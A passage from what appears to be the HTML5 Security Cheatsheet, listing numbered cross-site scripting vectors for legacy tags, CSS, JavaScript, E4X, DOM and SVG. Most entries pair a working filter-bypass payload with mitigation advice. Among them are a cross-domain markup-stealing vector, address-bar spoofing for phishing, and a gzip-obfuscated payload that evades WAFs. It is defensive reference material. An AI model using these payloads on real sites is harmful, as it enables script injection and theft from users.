Structures "<%" и "". The syntax in the tags such as <style>, <script> should be valid taking into account these sections, otherwise throws an exception. So, the second example shows that closing </script> tag will be considered as an operator "less" and the regular expression start. The examples are worked up to IE 9 standards mode. SGML-like comment delimiters is similarly parsed in older versions of Safari.
<xmp> <% </xmp> <img alt='%></xmp><img src=xx:x onerror=alert(1)//'> <script> x='<%' </script> %>/ alert(2) </script> XXX <style> *['{} *{color:red}</style>
Encode all opening brakets inside plaintext tags. Escape for the closing tags ("<\/script>") is not sufficient.
- xss
- plaintext
- internet explorer
- safari
- comment
- SGML
- escape
- #91
- #38
- #40
sirdarckcat, wpulog
JavaScript execution via <FRAMESET> and onpageshow#146 test
The <FRAMESET> element fires an "onpageshow" event without user interaction on all modern browsers. This can be abused to bypass blacklists as the event is not very well known. Note, that the same behavior is exposed by the <BODY> tag as well.
<frameset onpageshow="alert(1)"> <body onpageshow="alert(1)">
Be sure to work with whitelists when allowing users to submit markup - else ancient tags like <FRAMESET> might be forgotten to filter and escape.
- frameset
- onpageshow
- html
- legacy
Qab
JavaScript execution via <APPLET> with error events#149 test
The <APPLET> element fires an "onerror" event without user interaction on Internet Explorer and Edge. This can be used to bypass WAF and IDS systems as this combination of tag and attributes is meanwhile rather uncommon and unknown.
<applet onerror="alert(1)"></applet>
Be sure to work with whitelists when allowing users to submit markup - else legacy tags like <APPLET> might be forgotten to filter and escape.
- applet
- onerror
- html
- legacy
Ben Hayak

Cascading stylesheet injection based vectors
Opera link-source JavaScript execution via CSS#9 test
Opera allows setting link sources for arbitrary HTML elements - making them clickable and execute JavaScript. Note that Opera 11.0-11.01 requires an actual <a> tag to have this work - while earlier versions work with other tags too. For later versions still available a data URI.
<a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a>
- xss
- css
- link-source
- opera
- proprietary
- http://www.aptana.com/reference/html/api/CSS.field.-o-link-source.html
- https://hackvertor.co.uk/hvurl/3c
.mario
Opera whole-page click hijacking via CSS#27 test
Opera as well as other browsers allow to break out attribute selectors and other CSS constructs with {...} - opening the possibility for declaring new properties and assigning values - such as -o-link and -o-link-source. In this case those proprietary properties allow overlaying any selected element with a JavaScript URI link href. Note that as of Opera 11 -o-link only applies for <a> tags. On IE selector is broken up to IE 7 standards mode.
<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
In case users are allowed to submit CSS make sure the properties allowed are whitelisted and attribute selector content does not allow the combination {...} because it breaks out the attribute selector and allows declaration of new properties.
- xss
- javascript
- css
- opera
- attribute selectors
- proprietary
- http://www.aptana.com/reference/html/api/CSS.field.-o-link-source.html
- #9
.mario
JavaScript execution via <LINK> href attribute and data URI#29 test
Despite the existing documentation Internet Explorer 8 supports data URIs not only for displaying images but also supplying stylesheet information. This can be used to wrap expression() CSS into a data URI and execute JavaScript with a <LINK> tag. The example works up to IE 7 standards mode.
<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
Make sure stylesheet URIs cannot be controlled by the user - and user submitted <LINK> tags will not be displayed unfiltered.
- xss
- javascript
- internet explorer
- css
- style
- expression
- datauri
- proprietary
.mario
JavaScript execution via <STYLE> @import and data URI#30 test
Despite the existing documentation Internet Explorer 8 supports data URIs not only for displaying images but also supplying stylesheet information. This can be used to wrap expression() CSS into a data URI and execute JavaScript with a <STYLE> @import directive. The example works up to IE 7 standards mode.
<style>@import "data:,*%7bx:expression(write(1))%7D";</style>
Make sure stylesheet URIs cannot be controlled by the user - and user submitted <STYLE> cannot contain the @import directive.
- xss
- javascript
- internet explorer
- css
- style
- expression
- datauri
- proprietary
- http://msdn.microsoft.com/en-us/library/ms530768%28VS.85%29.aspx
.mario
Breaking pointer-events:none with nested links#33 test
Firefox 3.6+ allows using CSS "pointer-events" with value "none" to make sure an element will not react on any mouse/pointer based event. This feature enables for example placing a DIV over another DIV without blocking the click events addressed to the underlying DIV.
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>
The feature breaks as soon as <A> elements are being used in combination with "pointer-events:none" - containing other <A> elements. <A> elements should not be used for pointer-event logic at all - especially not when containing user controlled HTML.
- xss
- hijacking
- css
- pointer-events
- firefox
- safari
- chrome
- http://hacks.mozilla.org/2009/12/pointer-events-for-html-in-firefox-3-6/
.mario
Opera @import based XSS inside attribute selectors#44 test
Opera 10 and later version including latest Opera 10.5 allow breaking out an attribute selector with {} and use @import declarations afterwards. The MIME type for the imported file does not matter - also it can be loaded from arbitrary domains. The imported file contains CSS code to apply a JavaScript URI to all elements on the page to hijack any incoming click.
<style>*[{}@import'test.css?]{color: green;}</style>X
Make sure in user submitted CSS the contents of attribute selectors are properly escaped with backslashes. Also make sure to use a CSS property:value whitelist to forbid properties like -o-link and -o-link-source.
* {-o-link:'javascript:alert(1)';-o-link-source: current;}crossdomain: 1path: http://html5sec.org/test.cssname: test.css
- xss
- javascript
- opera
- css
- hijacking
- proprietary
.mario
CSS-string breaking#45 test
Opera, Firefox and other browsers allow breaking out an css-string with newline symbols. A string cannot directly contain a newline in CSS2+. [a] Characters*, accepted as CCS-strings breakers: Firefox, Internet Explorer (IE8+ standards mode), Opera, Google Chrome, Safari: 10,12,13 Opera 11.01↓, Google Chrome 16↓, Safari: 1-8,11,14-31,127 Opera 11.01↓: 0 * Characters are given as decimal ASCII table index.
<div style="font-family:'foo[a];color:red;';">XXX</div>
- trick
- opera
- firefox
- chrome
- firefox
- internet explorer
- css
LeverOne, Michal Zalewski
Alternative CSS syntax in Internet Explorer#46 test
Internet Explorer allows to use right curly brace (}) as a group separator (up to IE 7 standards mode). A CSS declaration in quirks mode (IE 5 standards mode) may consist of a property name, followed by a symbol of equality (=).
<div style="font-family:foo}color=red;">XXX</div>
- xss
- internet explorer
- css
- quirks mode
- proprietary
- trick
Gareth, LeverOne, sirdarckcat
Obfuscation css-properties and values via ignored extra characters#60 test
[a] Extra characters* ignored before property names (excluding backslash (92) and null character (0)) Firefox, Internet Explorer (any modes), Safari, Google Chrome, Opera : 9,10,12,13,32 Firefox, Internet Explorer**, Opera: 123*** Firefox 3.x, Internet Explorer**: 8 Internet Explorer**: 1-7,11,14-31,33,35-38,40-44,46-47,58,60-64,91,93-96,124-127,160,8192-8203,12288,65279 Internet Explorer**: CSS-strings [b] Extra characters ignored between property names and colon. Firefox, Internet Explorer (any modes), Safari, Google Chrome, Opera : 9,10,12,13,32 Internet Explorer**: 11 Internet Explorer (quirks mode): 1-8,14-31,33,35-38,40-44,46-47,60,62-64,91,93,94,96,123,124,126,127 Internet Explorer (quirks mode): CSS-strings, alnum sequences after non-alnum characters (color,foo:red) [c] Extra characters ignored before values Firefox, Internet Explorer, Safari, Google Chrome, Opera : 9,10,12,13,32 Internet Explorer: 0,11,160,8192-8203,12288,65279 * These are given in decimal codes. ** Up to IE 7 standards mode. *** Ignored only before first property names.
<div style="[a]color[b]:[c]red">XXX</div>
- trick
- css
- quirks mode
- obfuscation
- opera
- firefox
- internet explorer
- chrome
- safari
- fuzzing
- quirks mode
Gareth, hasegawayosuke, LeverOne, .mario, RSnake, sirdarckcat
CSS encoding and escaping#61 test
[a] Encoding. There are only three tricks to encode characters. [1] You can change the number of zeros: \0A -> \00000A [2] You can change the capital letter: \0A -> \0a [3] You can change the whitespace* accepted as delimiters after the encoded character. Firefox, Google Chrome, Internet Explorer, Opera, Safari: 9,10,12,13,32 Internet Explorer (IE7↓ Standards mode): 11,160,8192-8203,12288,65279 Properties in IE7↓ Standards mode may contain encoded null-character (\0). On Opera and in IE8+ Standards mode encoded null-character cuts off the right side of a CSS structure. The volume of possible encoding is different in the browsers. For example, FF can not encode parentheses, which is part of the functional notation. [b] Escaping. In addition, you can put a backslash before the character. Option of writing a null-character in Internet Explorer 7↓ Standards mode is escaping of any whitespace-character accepted as delimiters: col\&#160or:red In IE quirks mode inside the url() function a backslash can be treated as equivalent of a slash and thus will not have the escape role. Of course, these methods can be combined with other encoding and obfuscation (for example, change case of original characters). * These are given in decimal codes.
<div style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div>
- xss
- javascript
- css
- encoding
- escape
- backslash
- opera
- firefox
- internet explorer
- http://www.w3.org/TR/css3-syntax/#characters
- http://www.w3.org/TR/CSS2/syndata.html#escaped-characters
Gareth, LeverOne, Renaud Lifchitz, .mario
Slash-tags accepting style attributes#71 test
A slash-tag can still contain style attributes on IE as the example shows. For extra obfuscation a bogus CSS property is being used to execute the JavaScript via expression() combined with CSS escapes. This example works up to IE 7 standards mode.
<// style=x:expression\28write(1)\29>
Make sure the HTML filter you use deals with slash-tags and doesn't consider them to be plain text. Also be aware of CSS escapes and how they can completely obfuscate any style info inside <STYLE> tags and "style" attributes.
- xss
- javascript
- closing tag
- css
- style
- expression
- internet explorer
- quirks mode
- http://msdn.microsoft.com/en-us/library/ms537634%28VS.85%29.aspx
- http://www.w3.org/TR/CSS2/syndata.html
Gareth, .mario
IE6 and halfwidth/fullwidth Unicode characters#80 test
This example shows how halfwidth/fullwidth Unicode characters can be used on IE6 to substitute characters from the ASCII range. Note that those characters have been used in the example to create the term "expression".
<style>*{x:ｅｘｐｒｅｓｓｉｏｎ(write(1))}</style>
In case your website still has a lot of IE6 users make sure that the range of halfwidth and fullwidth form characters (U+FF00-FFEF) cannot be used in user submitted markup and styles.
- xss
- javascript
- css
- expression
- unicode
- halfwidth
- fullwidth
- internet explorer
- http://en.wikipedia.org/wiki/Halfwidth_and_Fullwidth_Forms_Unicode_block
.mario
SVG images containing XML data - with disabled JavaScript#90 test
Opera supports the CSS property "content" for style attributes. The SVG image can contain SVG as well as HTML code. The example for Opera 10.x shows how a <FORM> tag can be used to trick the user into clicking a button and thus executing JavaScript. Example for Opera 12.x shows one of the problems (along with a client side DoS, running the "onblur" event, etc), which is generated because of the possibility to steal a focus via embeded SVG image. The same works of course for SVG files embedded via <IMG> tags.
 <div style=content:url(test2.svg)></div>   <div style="background:url(test5.svg)">PRESS ENTER</div>
<form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:alert(1)">  <meta http-equiv="refresh" content="1;URL=test5.svg"/> <input type="submit" autofocus="autofocus"/> </form>required_mime: image/svg+xmlcrossdomain: 0path: http://html5sec.org/test5.svgname: test5.svg
- xss
- svg
- css
- opera
- content
- form
- http://heideri.ch/opera/
LeverOne
Breaking the functional notation on IE (1)#92 test
To break the functional notation on IE "url()" can be used combined with a following whitespace - then followed by any non-whitespace character. The following characters* are whitespaces: IE 6,7 standards mode: 9-13,32,160,8192-8203,12288,65279 IE 8 standards mode: 1-32,127 * These are given in decimal codes.
<div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>
- xss
- css
- internet explorer
- trick
- notation
LeverOne
Multiple CSS "url()" values in IE 6#93 test
Internet Explorer supports multiple "url()" values all of which can contain payload. The delimiter between the "url()" values should be a whitespace character ("\x20" in the given example).
<div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
Make sure in case the user is allowed to submit CSS it is being filtered and whitelisted correctly to avoid attacks via multiple backgrounds.
- xss
- css
- internet explorer
- trick
- url
LeverOne
Style injection when copying innerHTML (3)#98 test
The example shows that Internet Explorer and Mozilla Firefox automaticaly decode CSS-encoding if the harmless markup is copied using innerHTML.
<div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
Be very careful when handling user generated HTMl in the DOM later on. The innerHTML property does not always contain what it's supposed to.
- xss
- javascript
- internet explorer
- script
- dom
- innerhtml
- css
- #59
- #97
- #128
sirdarckcat
Using comments to obfuscate styles#99 test
As noted in CSS2.1 specification (and repeated in CSS3), comments may occur anywhere outside other tokens. The cases that are exceptions to this rule are a subject to special attention. First of all the CSS2.1 specification is inconsistent, since, for example, the "!important" token in his definition allows comments. Despite the exclusion this feature in CSS3, IE (8-9 standards mode) and Firefox 13 still support "!/**/important". You can find more obvious mistakes, for example, the same Firefox 13 allows "font-family: Ar/**/ial". Special interest are exceptions to this rule in IE. The first example shows the possibility for comments in the value of the property. The third example, in addition to demonstrating a similar possibility inside the "url()" function, is also an interesting case, when a comment can not be replaced by any other structure (another space or encoded space "\000020" will not give necessary effect). Typically these cases occur when the token does not match your precise definition. In this example token "url" can not contain a space character. Inside the <STYLE> tag, there are rules for parsing the SGML comment delimiters, that are allowed before and after statements regardless of the form (opening/closing) and nesting.
XXX<style> *{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */ <!--*{color:red} /* all UA */ *{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */ </style>
- trick
- css
- obfuscation
- internet explorer
- firefox
- opera
- chrome
- safari
- comment
Roman Ivanov, LeverOne
Breaking the functional notation on Chrome and Safari (2)#111 test
To break the functional notation "url()" can be used in combination with the following characters*: [a] 1-8,10-31,127,9,32,40 Note that simultaneous breaking of functional notation and strings can be accomplished by the characters listed in #45. * Characters are given as decimal ASCII table index.
<div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>
- xss
- css
- google chrome
- safari
- trick
- notation
- #45
- #92
- #112
- #114
LeverOne, .mario
Breaking the functional notation on IE (3)#112 test
If any* part of the CSS-declaration (property or value) contains a left curly brace ({ - not as part of a string), the CSS declaration cannot be closed without using a matching right curly brace (}). In most browsers this feature can not be used to bypass filters - as they require to close the strings, functions and attributes inside blocks. IE nevertheless does not require to close function inside such blocks. It is important to take into account especially when filtered styles are inside the targeted tag's attribute. The example works up to IE 7 standards mode. *There's another exception for IE (see the letters [a] and [b] of #60).
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
- xss
- css
- internet explorer
- trick
- notation
- #46
- #60
- #92
- #111
- #114
LeverOne
Jump into the selector via attribute delimiters#113 test
According to established practice selectors are usually filtered less thoroughly by filtering software than other parts of CSS language constructs. This example shows how to leave a CSS-block open to get hands on a selector and inject code into a possibly less thoroughly filtered area. On IE this example works in IE 8-9 standards mode.
<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
- xss
- css
- firefox
- opera
- trick
- selector
- attribute
- #27
LeverOne
Breaking the functional notation on Chrome and Safari (4)#114 test
The functional notation breaker shown in #111 also works with quoted strings for several CSS properties. The following characters can be used to break the string and create a new property-value pair: [a] Safari, Chrome 16↓: 1-8,10-31 and 127 Chrome 17↑: 10,12,13 (decimal ASCII table index)
<x style="background:url('x[a];color:red;/*')">XXX</x>
- xss
- css
- google chrome
- safari
- trick
- notation
- #45
- #92
- #111
- #112
.mario, LeverOne

Plain JavaScript vectors
Firefox setter based JavaScript execution#6 test
Using setters on Gecko/Firefox to execute JavaScript without parenthesis
<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
- xss
- dom
- firefox
- setter
- proprietary
- https://developer.mozilla.org/en/Core_JavaScript_1.5_Guide/Working_with_Objects#Defining_Getters_and_Setters
.mario
JavaScript execution via sharp variables#15 test
This vector demonstrates how sharp variables and cyclic references can be used for obfuscation to hide the actual method execution.
<script>({0:#0=alert/#0#/#0#(0)})</script>
- xss
- javascript
- firefox
- sharp
- proprietary
- https://developer.mozilla.org/en/Sharp_variables_in_JavaScript
.mario
JavaScript execution via overwritten ReferenceError object#20 test
This JavaScript vector shows how overwriting the ReferenceError object and causing the exact same kind of error afterwards can lead to JavaScript execution. This is of course the same for most other error objects and should be taken into consideration when implementing JavaScript sandboxes or comparable.
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
Do not trust the DOM in case the user can influence it via script injections, includes or other DOM based property access.
- javascript
- opera
- firefox
- chrome
- safari
- ReferenceError
- overwrite
- https://developer.mozilla.org/en/Core_JavaScript_1.5_Reference/Global_Functions/ReferenceError
.mario
JavaScript execution via proprietary __noSuchMethod__#21 test
Firefox supports the non-standard __noSuchMethod__ property which will be used as an interceptor as soon as a non existing object method is being called. It can be assigned with the Function object to force JavaScript execution without using function(){...}.
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
- xss
- javascript
- firefox
- __noSuchMethod__
- proprietary
- https://developer.mozilla.org/en/Core_JavaScript_1.5_Reference/Global_Objects/Object/noSuchMethod
Gareth, .mario
Spoofing the address bar information with history.replaceState()#103 test
The history.pushState() and history.replaceState() API allows to create and modify the user's history. An attacker can use this feature to change the information displayed in the address bar as well as the location DOM object and thus initiate phishing attacks or obfuscate bad intentions. While pushState adds a new history entry, replaceState modifies the current one. This removes nearly all traces of the actual location from the browsing history giving no possibility to navigate back. The information shown in the address bar cannot be trusted anymore as soon as an attacker or a malicious website execute JavaScript.
<script>history.pushState(0,0,'/i/am/somewhere_else');</script>
- xss
- javascript
- spoofing
- history
- phishing
- http://www.whatwg.org/specs/web-apps/current-work/multipage/history.html
.mario, freddyb
Executing JavaScript using ES6 Template Strings#140 test
ES6 specifies a new language feature called "Template Strings" (often also referred to as "Quasi Literals" alongside multi-line strings and others). This allows to execute arbitrary JavaScript code without using parenthesis but back-ticks instead. Inside back-tick delimited strings, placeholders such as ${} can wrap executable code.
<script> alert`1`; var something = `abc${alert(1)}def`; ``.constructor.constructor`alert\`1\````; </script>
Make sure that your IDS, filter and other protective systems are aware of the fact, that back-ticks (U+0060) are now capable of initiating execution of methods and functions in JavaScript. Further make sure, that symbols such as ${} cannot be injected into existing template and multi-line strings.
- es6
- javascript
- backtick
- template
.mario

E4X vectors working on gecko based browsers
Self-including E4X-based JavaScript snippet#25 test
This <SCRIPT> tag tries to include the very same page it is being executed from - and then executes the {}-delimited E4X payload. To avoid having Firefox throw an error during inclusion the ending sequence ;0 is necessary.
<script src="#">{alert(1)}</script>;1
E4X is extremely dangerous since any page can include sources providing valid XML and the mentioned semi-colon delimiter. For effective protection websites must be applied with a DOCTYPE - or contain invalid markup. There are many variations for the ending delimiter - as long it is valid JavaScript and not indicating the page is XML only it will work (;1, ,1, ._, etc..)
- xss
- javascript
- firefox
- e4x
- self-inclusion
- proprietary
- https://developer.mozilla.org/en/E4X
.mario
E4X-based UTF-7 JavaScript/HTML snippet stealing cross-domain markup#26 test
In case an attacker can inject the character sequence beginning with .toXMLString() it's possible to include the victimized website in a <SCRIPT> tag loaded from an arbitrary page and steal the markup of the included page - across domain and protocol borders. Note that the whole vector is encoded in UTF-7. This is possible since the including <SCRIPT> tag can decide via charset attribute what charset to use.
+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
Make sure all sites are being applied with a defined charset like UTF-8. Also incoming data should be converted from UTF-7 before being escaped with htmlentities() or comparable methods. All websites containing sensitive data should be applied with a DOCTYPE.
- xss
- javascript
- firefox
- e4x
- stealing
- utf7
- proprietary
- https://developer.mozilla.org/en/E4X
.mario
E4X used to close an opening <SCRIPT> tag and create an E4X object at the same time#58 test
This one is tricky. Firefox allows to end an opening <SCRIPT> tag with a new E4X object (<b/>) - already being created in the JavaScript scope at the same time. The alert can happen due to the fact that the additional < introduces a size comparison (<b/> < alert(1)).
<b><script<b></b><alert(1)</script </b></b>
- xss
- javascript
- e4x
- script
- parser
- regex
- https://developer.mozilla.org/en/E4X
- https://bugzilla.mozilla.org/show_bug.cgi?id=564706
.mario
E4X used to close an opening <SCRIPT> tag and {} evaluation#75 test
In this example an E4X object is being used to close a half-open <SCRIPT> tag and evaluate code in the global scope afterwards via the E4X curly bracket delimiters. This technique will not work anymore as soon Firefox uses the already integrated HTML5 parser (html5.enable=true)
<script<{alert(1)}/></script </>
- xss
- javascript
- e4x
- script
- parser
- regex
- https://developer.mozilla.org/en/E4X
- https://bugzilla.mozilla.org/show_bug.cgi?id=564706
.mario, Gareth

Vectors attacking DOM properties and methods
Self-including DOM Worker XSS#4 test
A self-including code snippet utilizing a DOM worker and firing a message event to itself causing script execution
0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))
- xss
- dom
- firefox
- worker
- self-inclusion
- e4x
- https://developer.mozilla.org/En/Using_web_workers
.mario
Firefox crypto object - hidden eval()#5 test
This vector uncovers a hidden eval() inside the Firefox crypto object
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
- xss
- dom
- firefox
- crypto
- eval
- csp
- proprietary
- https://developer.mozilla.org/en/JavaScript_crypto
.mario

JSON based vectors
Self-hijacking JSON literals#54 test
In case parts of a JSON literal are controlled by user input there's a risk to allow auto-harvesting values from later object members.
<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>
- xss
- javascript
- json
- __definesetter__
- object
- prototype
.mario

Vectors embedded in SVG files
SVG executing JavaScript via <G> tag and onload attribute#11 test
SVG files can execute JavaScript via onload events on any element without user interaction
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
SVG files should not be treated as images - especially when coming to uploads. An SVG file can contain arbitrary HTML data as well as event handlers in native elements
- xss
- svg
- onload
- opera
- firefox
- chrome
- internet explorer
- https://developer.mozilla.org/en/SVG
.mario
Opera 10 SVG font XSS#43 test
Opera 10.00 and later minor versions allow using SVG fonts and will - as soon as the font file has loaded even execute embedded JavaScript. The current example utilizes a load event handler to execute the JavaScript without user interaction as soon as the font file has been fully loaded.
<?xml version="1.0" standalone="no"?> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <style type="text/css"> @font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";} </style> </head> <body>Hello</body> </html>
<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>required_mime: image/svg+xmlcrossdomain: 0path: http://html5sec.org/font.svgname: font.svg
- xss
- javascript
- opera
- svg
- font
- svgfont
.mario
SVG file executing JavaScript via <SCRIPT> tag#47 test
SVG files can force the user agent to execute JavaScript via plain <SCRIPT> tags inside any SVG element without user interaction
<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
SVG files should not be treated as images - especially when coming to uploads. An SVG file can contain arbitrary HTML data as well as event handlers in native elements
- xss
- svg
- script
- opera
- firefox
- chrome
- internet explorer
Romain
SVG element allows automatic execution of onload attribute without other SVG elements.#65 test
SVG tags allow code to be executed with onload without any other elements. This makes for a very short and effective XSS vector, useful in many situations.
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
Not really a bug to fix, this is desired behaviour and only increases XSS scope.
- xss
- svg
- onload
- chrome
- firefox
- safari
- opera
- http://www.w3.org/TR/SVG11/attindex.html
- http://www.w3.org/TR/SVGTiny12/attributeTable.html
gareth
SVG simple passive JavaScript execution via XLink#87 test
Browsers that support SVG, forced to support XLink. The parameter of the attribute "xlink:actuate" for <a> tag is fixed - "onRequest".
<svg xmlns="http://www.w3.org/2000/svg"> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)"><rect width="1000" height="1000" fill="white"/></a> </svg>
- xss
- svg
- passive
- xlink
- chrome
- firefox
- safari
- opera
LeverOne
SVG active JavaScript execution via XLink in Opera#88 test
The content of the xml-links will be automatically included in the current document. The combination of "onLoad" (value of xlink:actuate) and "embed" (value of xlink:show) forms of potentially unsafe SVG-elements.
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <animation xlink:href="javascript:alert(1)"/> <animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/> <image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/> <foreignObject xlink:href="javascript:alert(1)"/> <foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/> </svg>
- xss
- svg
- active
- xlink
- opera
LeverOne
SVG event handler injection via "set" and "animate"#89 test
Google Chrome and Safari support binding an event handler using the elements <set> or <animate>. The attribute value is the actually bound event while the "to" attribute value holds the payload. The problem has been fixed in recent Chrome versions.
<svg xmlns="http://www.w3.org/2000/svg"> <set attributeName="onmouseover" to="alert(1)"/> <animate attributeName="onunload" to="alert(1)"/> </svg>
- xss
- svg
- event
- safari
- chrome
LeverOne
Using SVG element <handler>#94 test
Specification SVG Tiny 1.2 provides an element <handler>, which is a "bridge" between SVG and XML-events. This element can contain regular JavaScript.
<svg xmlns="http://www.w3.org/2000/svg"> <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler> </svg>
- xss
- svg
- opera
- XML-events
LeverOne
Using SVG element <feImage> and animated data URIs#95 test
SVG allows using filter effects to be applied on arbitrary visible SVG elements. The feImage filter allows inclusion of other files - as well as data URIs. With a maliciuosly crafted data URI it's possible to execute JavaScript without user interaction. List all of the elements which can be animated can be found in the specified documentation.
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <feImage> <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/> </feImage> </svg>
Make sure that user submitted SVG data and SVG files are treated as XML documents - not as images. The nature of SVG allows to include almost arbitrary XML data including JavaScript leading to XSS or worse.
- xss
- svg
- opera
- filter effects
- feimage
.mario
Executing JavaScript in SVG Tiny 1.2 without user interaction#104 test
Opera - providing advanced support for SVG Tiny 1.2 targeting mobile devices - allows to execute JavaScript without user interaction via arbitrary tags. The tag is being applied with a handler pointing to a data URI containing the actual handler. Important is the hash at the end of the data URI to identify the corrrect handler. It is also possible to refer to an element contained in the SVG by its ID or an external resource.
<svg xmlns="http://www.w3.org/2000/svg" id="foo"> <x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> </svg>
- xss
- javascript
- svg
- tinysvg
- listener
- xml
- events
.mario
SVG payload obfuscation with gzipped HTML and MIME type image/svg-xml#105 test
Opera allows displaying compressed SVG images without the usually necessary encoding header. This works for almost arbitrary data as long as the content type image/svg+xml is set - or image/svg-xml like in this example. Notice that the compressed data can be truncated. Opera will still accept it and render the <script> tag and execute the alert(1) - most other Gzip parsers will break though - rendering any WAF or similar tool trying to analyze the payload useless (gzip 1.3.12 states the payload contains 50+ MB of binary gibberish). The example contains no actual SVG code - just a regular <script> tag with a XHTML namespace attribute.
<iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
- xss
- javascript
- svg
- svgz
- gzip
- xml
- compression
- http://www.w3.org/TR/2002/CR-SVG11-20020430/minimize.html
.mario
Passive SVG JavaScript execution via style injection (1)#109 test
SVG supports several new CSS properties (clip-path, fill, filter, marker, marker-end, marker-mid, marker-start, mask, stroke), which can refer to external SVG-resources. These properties can also act as separate attributes. Within the external SVG can contain information to animate the current SVG-document. Example shows an animation links, but the possibilities of animation and other elements. Note that Opera does not show the user the change of links address, if the cursor does not go beyond it.
<svg xmlns="http://www.w3.org/2000/svg"> <a id="x"><rect fill="white" width="1000" height="1000"/></a> <rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/> </svg>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <clipPath id="a" > <set xlink:href="#x" attributeName="xlink:href" begin="1s" to="javascript:alert(1)" /> </clipPath> <pattern id="b"> <set xlink:href="#x" attributeName="xlink:href" begin="2s" to="javascript:alert(2)" /> </pattern> <filter id="c"> <set xlink:href="#x" attributeName="xlink:href" begin="3s" to="javascript:alert(3)" /> </filter> <marker id="d"> <set xlink:href="#x" attributeName="xlink:href" begin="4s" to="javascript:alert(1)" /> </marker> <mask id="e"> <set xlink:href="#x" attributeName="xlink:href" begin="5s" to="javascript:alert(2)" /> </mask> <linearGradient id="f"> <set xlink:href="#x" attributeName="xlink:href" begin="6s" to="javascript:alert(3)" /> </linearGradient> </svg>required_mime: image/svg+xmlcrossdomain: 1path: http://html5sec.org/test3.svgname: test3.svg
- xss
- javascript
- svg
- css
- xml
- style
- #129
LeverOne
Passive SVG JavaScript execution via style injection (2)#110 test
This example shows how SVG markers allow insertion of external links with JavaScript URI into the current document.
<svg xmlns="http://www.w3.org/2000/svg"> <path d="M0,0" style="marker-start:url(test4.svg#a)"/> </svg>
